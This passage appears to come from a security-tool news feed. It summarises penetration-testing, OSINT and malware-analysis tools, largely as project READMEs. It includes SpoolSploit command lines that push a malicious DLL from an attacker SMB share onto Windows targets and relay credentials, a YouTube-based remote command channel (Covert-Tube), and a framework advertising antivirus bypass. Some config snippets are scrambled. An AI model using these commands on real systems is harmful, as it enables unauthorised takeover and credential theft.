  • Multiprocessing - Speed up attacks using multiprocessing! By configuring the`parallel guess count, you're effectively telling BruteLoops how many usernames to guess in parallel.
  • Logging - Each authentication event can optionally logged to disk. This information can be useful during red teams by providing customers with a detailed attack timeline that can be mapped back to logged events.

Dependencies

BruteLoops requires Python3.7 or newer and SQLAlchemy 1.3.0, the latter of which can be obtained via pip and the requirements.txt file in this repository: python3.7 -m pip install -r requirements.txt


Installation
git clone https://github.com/arch4ngel/bruteloops
cd bruteloops
python3 -m pip install -r requirements.txt

How do I use this Damn Thing?

Jeez, alright already...we can break an attack down into a few steps:

  1. Find an attackable service
  2. If one isn't already available in the example.py[1] directory, build a callback
  3. Find some usernames, passwords, and credentials
  4. Construct a database by passing the authentication data to dbmanager.py[2]
  5. If relevant, Enumerate or request the AD lockout policy to intelligently configure the attack
  6. Execute the attack in alignment with the target lockout policy[1][3][4]


FUSE - A Penetration Testing Tool For Finding File Upload Bugs

10 October 2021 at 20:30
By: Zion3R


FUSE is a penetration testing system designed to identify Unrestricted Executable File Upload (UEFU) vulnerabilities. The details of the testing strategy is in our paper, "FUSE: Finding File Upload Bugs via Penetration Testing", which appeared in NDSS 2020. To see how to configure and execute FUSE, see the followings.


Setup

Install

FUSE currently works on Ubuntu 18.04 and Python 2.7.15.

  1. Install dependencies
# apt-get install rabbitmq-server
# apt-get install python-pip
# apt-get install git
  1. Clone and build FUSE
$ git clone https://github.com/WSP-LAB/FUSE
$ cd FUSE && pip install -r requirements.txt
  • If you plan to leverage headless browser verification using selenium, please install Chrome and Firefox web driver by refering selenium document.

Usage

Configuration
  • FUSE uses a user-provided configuration file that specifies parameters for a target PHP application. The script must be filled out before testing a target Web application. You can check out README file and example configuration files.

  • Configuration for File Monitor (Optional)

$ vim filemonitor.py

...
10 MONITOR_PATH='/var/www/html/' <- Web root of the target application
11 MONITOR_PORT=20174 <- Default port of File Monitor
12 EVENT_LIST_LIMITATION=8000 <- Maxium number of elements in EVENT_LIST
...

Execution
  • FUSE
$ python framework.py [Path of configuration file]
  • File Monitor
$ python filemonitor.py
  • Result
    • When FUSE completes the penetration testing, a [HOST] directory and a [HOST_report.txt] file are created.
    • A [HOST] folder stores files that have been attempted to upload.
    • A [HOST_report.txt] file contains test results and information related to files that trigger U(E)FU.

CVEs

If you find UFU and UEFU bugs and get CVEs by running FUSE, please send a PR for README.md

Application CVEs
Elgg CVE-2018-19172
ECCube3 CVE-2018-18637
CMSMadeSimple CVE-2018-19419, CVE-2018-18574
CMSimple CVE-2018-19062
Concrete5 CVE-2018-19146
GetSimpleCMS CVE-2018-19420, CVE-2018-19421
Subrion CVE-2018-19422
OsCommerce2 CVE-2018-18572, CVE-2018-18964, CVE-2018-18965, CVE-2018-18966
Monstra CVE-2018-6383, CVE-2018-18694
XE XEVE-2019-001

Author

This research project has been conducted by WSP Lab at KAIST.


Citing FUSE

To cite our paper:

Distributed System Security Symposium}, year = 2020 } ">
@INPROCEEDINGS{lee:ndss:2020,
author = {Taekjin Lee and Seongil Wi and Suyoung Lee and Sooel Son},
title = {{FUSE}: Finding File Upload Bugs via Penetration Testing},
booktitle = {Proceedings of the Network and Distributed System Security Symposium},
year = 2020
}


Qu1cksc0pe - All-in-One Static Malware Analysis Tool

10 October 2021 at 11:30
By: Zion3R


This tool allows you to statically analyze Windows, Linux, OSX executables and APK files.

You can get:

  • What DLL files are used.
  • Functions and APIs.
  • Sections and segments.
  • URLs, IP addresses and emails.
  • Android permissions.
  • File extensions and their names.
    And so on...

Qu1cksc0pe aims to get even more information about suspicious files and helps user realize what that file is capable of.


Usage
python3 qu1cksc0pe.py --file suspicious_file --analyze

Setup

Necessary python modules:

  • puremagic => Analyzing target OS and magic numbers.
  • androguard => Analyzing APK files.
  • apkid => Check for Obfuscators, Anti-Disassembly, Anti-VM and Anti-Debug.
  • prettytable => Pretty outputs.
  • tqdm => Progressbar animation.
  • colorama => Colored outputs.
  • oletools => Analyzing VBA Macros.
  • pefile => Gathering all information from PE files.
  • quark-engine => Extracting IP addresses and URLs from APK files.
  • pyaxmlparser => Gathering informations from target APK files.
  • yara-python => Android library scanning with Yara rules.
  • prompt_toolkit => Interactive shell.


Installation of python modules: pip3 install -r requirements.txt
Gathering other dependencies:

  • VirusTotal API Key: https://virustotal.com
  • Binutils: sudo apt-get install binutils
  • ExifTool: sudo apt-get install exiftool
  • Strings: sudo apt-get install strings

Alert

You must specify jadx binary path in Systems/Android/libScanner.conf

[Rule_PATH]
rulepath = /Systems/Android/YaraRules/

[Decompiler]
decompiler = JADX_BINARY_PATH <-- You must specify this.

Installation
  • You can install Qu1cksc0pe easily on your system. Just execute the following command.
    Command 0: sudo pip3 install -r requirements.txt
    Command 1: sudo python3 qu1cksc0pe.py --install

Scan arguments

Normal analysis

Usage: python3 qu1cksc0pe.py --file suspicious_file --analyze


Multiple analysis

Usage: python3 qu1cksc0pe.py --multiple FILE1 FILE2 ...


Hash scan

Usage: python3 qu1cksc0pe.py --file suspicious_file --hashscan


Folder scan

Supported Arguments:

  • --hashscan
  • --packer

Usage: python3 qu1cksc0pe.py --folder FOLDER --hashscan




VirusTotal

Report Contents:

  • Threat Categories
  • Detections
  • CrowdSourced IDS Reports

Usage for --vtFile: python3 qu1cksc0pe.py --file suspicious_file --vtFile




Document scan

Usage: python3 qu1cksc0pe.py --file suspicious_document --docs



Programming language detection

Usage: python3 qu1cksc0pe.py --file suspicious_executable --lang




Interactive shell

Usage: python3 qu1cksc0pe.py --console



Domain

Usage: python3 qu1cksc0pe.py --file suspicious_file --domain


Informations about categories

Registry

This category contains functions and strings about:

  • Creating or destroying registry keys.
  • Changing registry keys and logs.

File

This category contains functions and strings about:

  • Creating/modifying/infecting/deleting files.
  • Getting information about file contents and filesystems.

Networking/Web

This category contains functions and strings about:

  • Communicating with malicious hosts.
  • Downloading malicious files.
  • Sending informations about infected machine and its user.

Process

This category contains functions and strings about:

  • Creating/infecting/terminating processes.
  • Manipulating processes.

Dll/Resource Handling

This category contains functions and strings about:

  • Handling DLL files and another malware's resource files.
  • Infecting and manipulating DLL files.

Evasion/Bypassing

This category contains functions and strings about:

  • Manipulating Windows security policies and bypassing restrictions.
  • Detecting debuggers and doing evasive tricks.

System/Persistence

This category contains functions and strings about:

  • Executing system commands.
  • Manipulating system files and system options to get persistence in target systems.

COMObject

This category contains functions and strings about:

  • Microsoft's Component Object Model system.

Cryptography

This category contains functions and strings about:

  • Encrypting and decrypting files.
  • Creating and destroying hashes.

Information Gathering

This category contains functions and strings about:

  • Gathering informations from target hosts like process states, network devices etc.

Keyboard/Keylogging

This category contains functions and strings about:

  • Tracking infected machine's keyboard.
  • Gathering information about targets keyboard.
  • Managing input methods etc.

Memory Management

This category contains functions and strings about:

  • Manipulating and using target machines memory.


GitOops - All Paths Lead To Clouds

9 October 2021 at 20:30
By: Zion3R


GitOops is a tool to help attackers and defenders identify lateral movement and privilege escalation paths in GitHub organizations by abusing CI/CD pipelines and GitHub access controls.


It works by mapping relationships between a GitHub organization and its CI/CD jobs and environment variables. It'll use any Bolt-compatible graph database as backend, so you can query your attack paths with openCypher:

MATCH p=(:User{login:"alice"})-[*..5]->(v:EnvironmentVariable)
WHERE v.name =~ ".*SECRET.*"
RETURN p


GitOops takes inspiration from tools like Bloodhound and Cartography.

Check out the docs and more example queries.



AF-ShellHunter - Auto Shell Lookup

9 October 2021 at 11:30
By: Zion3R


AF-ShellHunter: Auto shell lookup

AF-ShellHunter its a script designed to automate the search of WebShell's in AF Team


How to

pip3 install -r requirements.txt
python3 shellhunter.py --help


Basic Usage

You can run shellhunter in two modes

  • --url -u When scanning a single url
  • --file -f Scanning multiple URLs at once

Example searching webshell with burpsuite proxy, hiding string "404" with a size between 100 and 1000 chars

โ”Œโ”€โ”€(blueudpใ‰ฟxxxxxxxx)-[~/AF-ShellHunter]
โ””โ”€$ python3 shellhunter.py -u https://xxxxxxxxxx -hs "404" -p burp --greater-than 100 --smaller-than 1000
Running AF-Team ShellHunt 1.1.0

URL: https://xxxxxxxxxx
Showing only: 200, 302
Threads: 20
Not showing coincidence with: 404
Proxy: burp
Greater than: 100
Smaller than: 1000
Found https://xxxxxxxxxx/system.php len: 881


File configuration for multiple sites

phishing_list

en mantenimiento' with size between 100 and 1000 chars [burp] https://banco.phishing->show-response-code "302" "200", not show-string "pรกgina en mantenimiento", greater-than 100, smaller-than 1000 [noproxy] banco.es-> # ShellHunt will add 'http:// ">
# How to?
# set country block with [country], please read user_files/config.txt

# 'show-response-code "option1" "option2"' -> show responses with those status codes, as -sc
# 'show-string' -> show match with that string, as -ss
# 'show-regex' -> show match with regex, as -sr

# use 'not' for not showing X in above options, as -h[option]

# 'greater-than' -> Show response greater than X, as -gt ( --greater-than )
# 'smaller-than' -> Show responses smaller than X, as -st ( --smaller-than )


# Example searching webshell with BurpSuite proxy. 302, 200 status code, not showing results w/ 'pรกgina en mantenimiento' with size between 100 and 1000 chars

[burp]
https://banco.phishing->show-response-code "302" "200", not show-string "pรกgina en mantenimiento", greater-than 100, smaller-than 1000

[noproxy]
banco.es-> # ShellHunt will add 'http://

Setting your proxies and custom headers

config.txt

Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36 Referer? bit.ly/THIS_is_PHISHING # Bypass referer protection [PROXIES] burp? https://127.0.0.1:8080,http://127.0.0.1:8080 ">
[HEADERS]  # REQUESTS CUSTOM HEADERS, ADD 'OPTION: VALUE'
User-Agent? Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36
Referer? bit.ly/THIS_is_PHISHING # Bypass referer protection

[PROXIES]
burp? https://127.0.0.1:8080,http://127.0.0.1:8080

Other features
  1. Filter by regex
  2. Filter by string
  3. Filter by HTTP Status code
  4. Filter by length
  5. Custom Headers
  6. Custom proxy or proxy block for URL file
  7. Multithreading ( custom workers number )
                                                              .-"; ! ;"-.
----. .'! : | : !`.
" _} /\ ! : ! : ! /\
"@ > /\ | ! :|: ! | /\
|\ 7 ( \ \ ; :!: ; / / )
/ `-- ( `. \ | !:|:! | / .' )
,-------,**** (`. \ \ \!:|:!/ / / .')
~ >o< \---------o{___}- => \ `.`.\ |!|! |/,'.' /
/ | \ / ________/8' `._`.\\\!!!// .'_.'
| | / " `.`.\\|//.'.'
| / | |`._`n'_.'|
"----^----"


Viper - Intranet Pentesting Tool With Webui

8 October 2021 at 20:30
By: Zion3R


  • Viper is a graphical intranet penetration tool, which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration
  • Viper integrates basic functions such as bypass anti-virus software, intranet tunnel, file management, command line and so on
  • Viper has integrated 80+ modules, covering Resource Development / Initial Access / Execution / Persistence / Privilege Escalation / Defense Evasion / Credential Access / Discovery / Lateral Movement / Collection and other categories
  • Viper's goal is to help red team engineers improve attack efficiency, simplify operation and reduce technical threshold
  • Viper supports running native msfconsole in browser and multi - person collaboration






Website

Installation manual

FAQ

Issues

Modules

System architecture diagram



Development Manual

Source Code
  • viperjs (Frontend)

https://github.com/FunnyWolf/viperjs

  • viperpython (Backend)

https://github.com/FunnyWolf/viperpython

  • vipermsf (MSFRPC)

https://github.com/FunnyWolf/vipermsf


Acknoladgement

Edward_Snowdeng exp Fnzer0qingyun00่„ธ่ฐฑ NoobFTW Somd5-ๅฐๅฎ‡ timwhitezViCrackxiaobei97yumusb



Covert-Tube - Youtube As Covert-Channel - Control Systems Remotely And Execute Commands By Uploading Videos To Youtube

8 October 2021 at 11:30
By: Zion3R


A program to control systems remotely by uploading videos to Youtube using Python to create the videos and the listener, emulating some malware I was reading about. It allows to create videos with frames formed of simple text, QR codes with cleartext or QR codes using AES encryption.


Create a video

The videos can be created using generate_video.py: enter the commands and generate the video writing "exit". The video generated is called by default output.avi (can be updated in config.py):

python3 generate_video.py


ย 

Run the listener and upload the video to Youtube
python3 main.py

The listener will check the Youtube channel every 300 seconds by default (can be updated in config.py). First the video is uploaded:



After finding there is a new video in the channel, it is downloaded and the commands are executed:


ย 

We can see the output from the commands:



Configuration

Update the config.py file:

  • channel_id (Mandatory!!!): Get your Youtube channel ID from here.

  • api_key (Mandatory!!!): To get the API key create an application and generate the key from here.

  • image_type (Optional. Default: "qr_aes"): Different types of images for the video.

    • "cleartext" creates images with the words of the commands.
    • "qr" creates QR codes with the commands.
    • "qr_aes" creates QR codes with the commands encrypted with AES.
  • upload_seconds_delay (Optional. Default: 300): Seconds delay until checking if a new video has been uploaded.

  • debug (Optional. Default: True): Print messages or not.

  • aes_key (Optional. Default: "covert-tube_2021"): Key for AES encryption, used in the "qr_aes" option.

  • generated_video_path (Optional. Default: "output.avi"): Path of video generated with generate_video.py.

  • downloaded_video_path (Optional. Default: "/tmp/test.mp4"): Path where the new video will be downloaded.

  • temp_folder (Optional. Default: "/tmp/"): Path where images of every frame from the video are stored, with the format image_X.png.


Installing dependencies

For all the project:

pip3 install Pillow opencv-python youtube_dl pytesseract pyqrcode pypng pyzbar pycrypto

For only the "cleartext" option (OCR):

pip3 install Pillow opencv-python youtube_dl pytesseract

For only the QR without encryption option:

pip3 install Pillow opencv-python youtube_dl pyqrcode pypng pyzbar

For only the QR with AES encryption option:

pip3 install Pillow opencv-python youtube_dl pyqrcode pypng pyzbar pycrypto

Creating a standalone binary
pyinstaller --onefile main.py
cp dist/main covert-tube
rm -rf dist build
rm main.spec

Motivation

Lately I have been reading about malware using Youtube for controlling their setting remotely. For example, Casbaneiro abuses YouTube to store its C&C server domains. Each video on the channels used by the threat actor contains a description and at the end of these there is a link to a bogus Facebook or Instagram url containing the C&C server domain (Welivesecurity blog). A second example is Numando, which abuses it by encrypting the data in the title of the Youtube videos (other Welivesecurity blog).

Knowing this I decided to create a PoC to test the control of remote systems uploading videos to Youtube but, instead of using the title or the description, using the content of the video. It allows to execute any command, but it could be used to change some settings remotely. So this is just a PoC, use it for educational purposes!



Attack-Surface-Framework - Tool To Discover External And Internal Network Attack Surface

7 October 2021 at 20:30
By: Zion3R


ASF aims to protect organizations acting as an attack surface watchdog, provided an โ€œObjectโ€ which might be a: Domain, IP address or CIDR (Internal or External), ASF will discover assets/subdomains, enumerate their ports and services, track deltas and serve as a continuous and flexible attacking and alerting framework leveraging an additional layer of support against 0 day vulnerabilities with publicly available POCs.


Motivation

The lack of support and flexibility to automate discovery of dynamic assets and their associated vulnerabilities through continuous scanning or exploitation in a single pane of glass was the driving force in the creation of ASF, the current solutions are restricted by the technology or the program they are built for, we wanted a solution that is scalable as well as utilizes popular Open Source security tools for handling a full vulnerability lifecycle.

ASF is a breed of open source projects leveraging a powerful arsenal of tools wrapped in a single pane of glass on top of a GUI. ASF architectural diagram illustrated below:



Prerequisites

Latest version of Kali Linux (tested on 64 bits) - https://kali.org/get-kali/

16 GB of RAM at least

1 TB HD - XFS filesystem recommended


Build & Run

As root

  1. git clone https://github.com/vmware-labs/attack-surface-framework.git /opt/asf
  2. cd /opt/asf/
  3. Run ./setup.sh
  4. Assign youruser, email and yourpass

Once the installation is completed

  1. cd /opt/asf/frontend/asfgui/
  2. . bin/activate
  3. python3 manage.py runserver 0.0.0.0:8080 - We recommend to run it on a screen session to leave server persistent (screen -S asf)

Security

ASF is not meant to be publicly exposed, assuming you install it on a cloud provider or even on a local instance, we recommend to access it using port forwarding through SSH, here is an example:

ssh -i "key.pem" -L 8080:127.0.0.1:8080 [email protected] - For ASF GUI

ssh -i "key.pem" -L 9045:127.0.0.1:9045 [email protected] - To access Graylog2 Panel

Then open your browser and go to:

http://127.0.0.1:8080 - For ASF - user:youruser pass:yourpass (provided in initial setup)

https://127.0.0.1:9045 - For Graylog2 - user:admin pass:admin #Change it in /graylog/docker-compose.yaml

Graylog2 requires a few steps to start receiving logs from ASF:

Once logged in, go to System/"Content Packs" and import the Content Pack located at /opt/asf/tools/graylog/content_pack_ASF.json, click on the "Upload" button and you should see "Basic" reflected in the "Select Content Packs" section, click on "Basic", make sure the "ASF" radio button is selected and hit the "Apply content" button, this will create the Global input to parse JSON logs and related extractors.



ย Now you are ready to receive logs from ASF and setup your streams / alerts / dasboards !

More info @ https://docs.graylog.org/en/4.1/


Documentation

ASF has two scopes:

A) External: For your publicly exposed assets.

B) Internal: Assets in your corporate network.

For the External scope, the flow goes through four basic steps:

A.1 Targets - Here is where you input your targets


ย 

A.2 Discovery - Module that runs the Amass process to discover publicly exposed assets, feel free to create your configuration file to setup your API keys https://github.com/OWASP/Amass/blob/master/examples/config.ini



A.3 Enumeration - Module that runs the NMAP process to enumerate ports/services and create filters for the Redteam module. Default setup is to look for --top-ports 200 but you can suit it to your needs in /opt/asf/tools/nmap/*.sh



A.4 Redteam - Module that runs submodules located in "/opt/asf/redteam"


ย 

Note: For the Internal scope, the flow goes through A.1(Targets),A.3(Enumeration) and A.4(Redteam).


Contributing

The attack-surface-framework project team welcomes contributions from the community. Before you start working with attack-surface-framework, please read our Developer Certificate of Origin. All contributions to this repository must be signed as described on that page. Your signature certifies that you wrote the patch or have the right to pass it on as an open-source patch. For more detailed information, refer to CONTRIBUTING.md.


License

Attack Surface Framework Copyright 2021 VMware, Inc.

The BSD-2 license (the "License") set forth below applies to all parts of the Attack Surface Framework project. You may not use this file except in compliance with the License.

BSD-2 License

Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:

Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.

Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.

THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.


Notice

Attack Surface Framework Copyright 2021 VMware, Inc.

This product is licensed to you under the BSD-2 license (the "License"). You may not use this product except in compliance with the BSD-2 License.

This product may include a number of subcomponents with separate copyright notices and license terms. Your use of these subcomponents is subject to the terms and conditions of the subcomponent's license, as noted in the LICENSE file.


Credits

https://www.djangoproject.com/

https://github.com/creativetimofficial/material-dashboard-django

https://nmap.org/

https://github.com/OWASP/Amass

https://github.com/lanjelot/patator

https://github.com/FortyNorthSecurity/EyeWitness

https://github.com/projectdiscovery/nuclei

https://www.metasploit.com

https://www.kalilinux.org

https://www.graylog.org/products/open-source

https://github.com/wpscanteam/wpscan

https://github.com/vanhauser-thc/thc-hydra

https://nxlog.co/products/nxlog-community-edition

https://www.docker.com/


Presented at Blackhat Arsenal

https://www.blackhat.com/us-21/arsenal/schedule/index.html#vdoberman-24096



SpoolSploit - A Collection Of Windows Print Spooler Exploits Containerized With Other Utilities For Practical Exploitation

7 October 2021 at 11:30
By: Zion3R


A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.


Summary

SpoolSploit is a collection of Windows print spooler exploits containerized with other utilities for practical exploitation. A couple of highly effective methods would be relaying machine account credentials to escalate privileges and execute malicious DLLs on endpoints with full system access.

ย 


Getting Started

As of the release date the SpoolSploit Docker container has been tested successfully on the latest versions of MacOS, Ubuntu Linux, and Windows 10.

Although not required, if you would like to host malicious DLLs or conduct credential relay attacks, all within the SpoolSploit container, you should ensure port 445 is not in use on the host running Docker. This is most prevalent when running this container on a Windows host, as it uses port 445 by default. If disabling port 445 on your host is not practical, that is okay! You can simply run the docker container in a virtual machine that has the network adapter configured in bridge mode. This will allow for serving malicious DLLs and relay credentials. If you only want to serve malicious DLLs, you could simply host the DLLs on an anonymous access share on your host OS or a compromised server share.


Create and access the SpoolSploit Docker container
  1. Clone this repository
git clone https://github.com/BeetleChunks/SpoolSploit
  1. Build the SpoolSploit Docker container image
cd SpoolSploit
sudo docker build -t spoolsploit .
  1. Create and start the SpoolSploit Docker container
sudo docker run -dit -p 445:445 --name spoolsploit spoolsploit:latest
  1. Attach to the container
sudo docker exec -it spoolsploit /bin/bash

Command-line Usage
usage: spool_sploit.py [-h] -a {spoolsample,nightmare} -rH RHOST -rP {139,445} [-lH LHOST] [-lS LSHARE] -d DOMAIN -u USER -p PASSWD

optional arguments:
-h, --help show this help message and exit
-a {spoolsample,nightmare}, --attack {spoolsample,nightmare}
Attack type to execute on target(s).
-rH RHOST, --rhost RHOST
Remote target IP, CIDR range, or filename (file:<path>)
-rP {139,445}, --rport {139,445}
Remote SMB server port.
-lH LHOST, --lhost LHOST
Listening hostname or IP
-lS LSHARE, --lshare LSHARE
Staging SMB share (UNC)
-d DOMAIN, --domain DOMAIN
Domain for authentication
-u USER, --username USER
Username for authentication
-p PASSWD, --password PASSWD
Password for authentication

Example - spoolsample:
python3 spool_sploit.py -a spoolsample -lH 10.14.1.24 -d evil.corp -u rjmcdow -p 'P4ssword123!' -rP 445 -rH 10.5.1.10

Example - nightmare:
python3 spool_sploit.py -a nightmare -lS '\\10.14.1.24\C$\CreateAdmin.dll' -d evil.corp -u rjmcdow -p 'P4ssword123!' -rP 445 -rH 10.5.1.10

SpoolSample - Capture and relay Windows machine account credentials

The SpoolSploit Docker container includes Responder for relaying machine account hashes obtained from executing the spoolsample attack in SpoolSploit. As several great articles exist detailing the process of relaying privileged machine account credentials for privilege escalation, I will not go into those details here.



PrintNightmare (CVE-2021-1675) - Execute malicious DLLs on Windows targets as SYSTEM

Included in the SpoolSploit container is an SMB server implemented via Impacket. This server can be used to host malicious DLLs when executing the printnightmare attack in SpoolSploit. The default SMB server settings work, but if you want to customize them you can modify the configuration file located at /home/dlogmas/smbserver/smb-v1.conf.

The only thing you need to do is copy your DLL to the SMB server's share folder in the SpoolSploit container. The share path in the container is /home/dlogmas/smbserver/share/. The following commands demonstrate how to upload a DLL to the SpoolSploit container and make it accessible to the SMB server.

sudo docker cp ./malicious.dll spoolsploit:/home/dlogmas/smbserver/share/
sudo docker exec spoolsploit /bin/sh -c 'sudo chown dlogmas:dlogmas /home/dlogmas/smbserver/share/malicious.dll'



Disclaimer

This proof-of-concept code has been created for academic research and is not intended to be used against systems except where explicitly authorized. The code is provided as is with no guarantees or promises on its execution. I am not responsible or liable for misuse of this code.


Credits

SpoolSample - Microsoft Feature

PrintNightmare - CVE-2021-1675 / CVE-2021-34527


Smersh - A Pentest Oriented Collaborative Tool Used To Track The Progress Of Your Company'S Missions

6 October 2021 at 20:30
By: Zion3R


Smersh is a pentest oriented collaborative tool used to track the progress of your company's missions and generate rapport.


Preview front (Angular):


Documentation

All information is available at the following address: https://docs.smersh.app


How to contribute ?

Just fork repository then create branch, work and push your content + create PR

git checkout -b MyBranch
git add -p
git commit -m "xx"
git push origin MyBranch

Roadmap
  • Coming soon

Contributors



Scrummage - The Ultimate OSINT And Threat Hunting Framework

6 October 2021 at 11:30
By: Zion3R


VERSION 3.6

  • Code efficiency enhancements and bug fixes for plugins, and improved logging.
  • Significant UI/UX enhancements.
  • Organisation specific settings and configurations, allowing for predefined searches based on your organisation and it's users.
  • Due to the above change, if you are upgrading from version 3.4, a major update has been made to the config.json file. In the installation directory, there is a file called "3.6_Upgrade.py", please copy your config.json file to this directory and run the script to update it to the latest standard. Running it will create a file called "config_new.json", please keep a backup of your old config.json file, and then rename the "config_new.json" file to "config.json" and move it to the config directory.
  • Over 20 new plugins!
  • API Enhancements and new endpoints for identity management.
  • Please note versions 3.3 - 3.6 entail a major overhaul of a lot of backend and frontend code for improved efficiency. Please don't hesitate to reach out about any code stability issues.

Scrummage is an OSINT tool that centralises search functionality from powerful, yet simple OSINT sites. This project draws inspiration mainly from two other projects, including:

  • The Scumblr project, which while is now deprecated, inspired this concept.
  • The OSINT Framework project, which is a visualisation tool, depicting a range of sites that can be used to search for a variety of things.

While at first glance the web application may not look all that different when compared to Scumblr, the copious amounts of plugins this tool comes with is mainly what makes this project unique, where the provided Python/Flask web application is just a simple, lightweight, and scalable way of providing users with the ability to manage large pools of results. The other main benefit this projects brags is a much simpler installation process, which is kept up to date, compared to Scumblr which is now deprecated.

Any feedback is welcome.

FOR INSTRUCTIONS REFER TO THE WIKI


An Overview of the Web Application

Some of the Many Available Scrummage Plugins
  • Blockchain Search
  • Domain Fuzzer
  • Twitter Scraper
  • Instagram Search
  • Have I Been Pwned Search
  • Ahmia Darkweb Search
  • IP Stack Search
  • Threat Crowd Search
  • Yandex and Naver Search
  • Vkontakte Search
  • Vulners Search
  • Built With Search
  • YouTube Search
  • Many more... Refer to the wiki page here for the full list.

Dashboard

The dashboard is the home screen which the application directs a user to when they log in. It provides a high-level chart which shows the amount of each results based on their result type. It does this for each kind of finding. However, if a graph doesnโ€™t load, this is most likely due to none of the results being in that category, I.e if there are no closed results, no graph will appear under โ€œOverview of Closed Resultsโ€.



Events

The events page shows anything that changes within the web application, from logins, to failed login attempts, to any actions performed against a task. This assists with understanding what has recently been happening in the web app, and can assist in matters such as detecting brute-force login attempts or tracking down who altered a task.

Note: This page only loads the latest 1000 events, for optimisation of the web application.



Results

The results page, simply shows results that have been created by a task. The results table shows the basic metadata of the result, but also provides a โ€œDetailsโ€ button which can be used to investigate the result further. As mentioned all results have some kind of output file, if a result is a link the file will be a copy of the HTML of the page. Furthermore screenshot functionality is provided to assist in keeping a photographic record of a result. Both the output and screenshot file will be deleted if the result is deleted.

Note: This page only loads the latest 1000 results, for optimisation of the web application.


For optimisation purposes, the results table only displays some of the general information regarding a result, to investigate a result further, the user should use the Details button. The details page allows the user to view the soft copy of the result's link and provides the ability for a user to generate a screenshot.


Tasks

The tasks page shows all created task, and provides the ability for the user to run each task. This page doesnโ€™t have a limit on tasks; however, donโ€™t go crazy creating tasks, you can always add a list to a task, rather than having the same task created multiple times for one search. So really you shouldnโ€™t have any more than 50 tasks. Tasks have caching and logging for each which can be found in the โ€œprotected/outputโ€ directory under the tasks name, ex. Google Search is called โ€œgoogleโ€. If you need to remove the cache, you can edit/delete the appropriate cache file.


All the plugins are open-source, free to individuals, just like the rest of the code. Furthermore, feel free to use the pre-existing libraries used in other plugins. If you are creating or editting a plugin, make sure to understand that when you run it for the first time, the web app may reload to reload the python cache. This is normal.


Account Settings

This page changes according to the user's privileges, if a user is an admin, they have the ability to change their password as well as other user's passwords, they can block and unblock users, demote and promote users' privileges, and of course create new users and delete existing users.
Additionally users with administrative privileges can check and edit input, output, and core configuration of the tool.
The account page looks as per below for administrative users:


The account page looks as per below for non-administrative users:


Identities

This concept was introduced in v3.6 of the Scrummage platform, this page is not to be confused with the Account Settings page. Account Settings is for managing users of the Scrummage platform itself, identities, is an entirely optional feature, where if rows are present, the information within can be used when executing tasks.
This is the main page, depicting a table with a faux identity created for documentation purposes:

ย 

Identities can be created one of three ways:

  1. Individual creation (Use the "Create Identity" function.)ย 

  2. Bulk upload of identities (Use the "Bulk Upload" function.)ย 

  3. If you have an IDM system in place, you are welcome to onboard straight to the Scrummage database, under the org_identities table. This will help streamline and maintain your list of identities effectively.

Developers

Contributions Welcome!!
We welcome and encourage you to contribute to this project through creation of new plugins. If you are insterested please refer to the plugin development guide here, this will give you a run through of how to develop a Scrummage plugin, using the custom libraries provided.



โŒ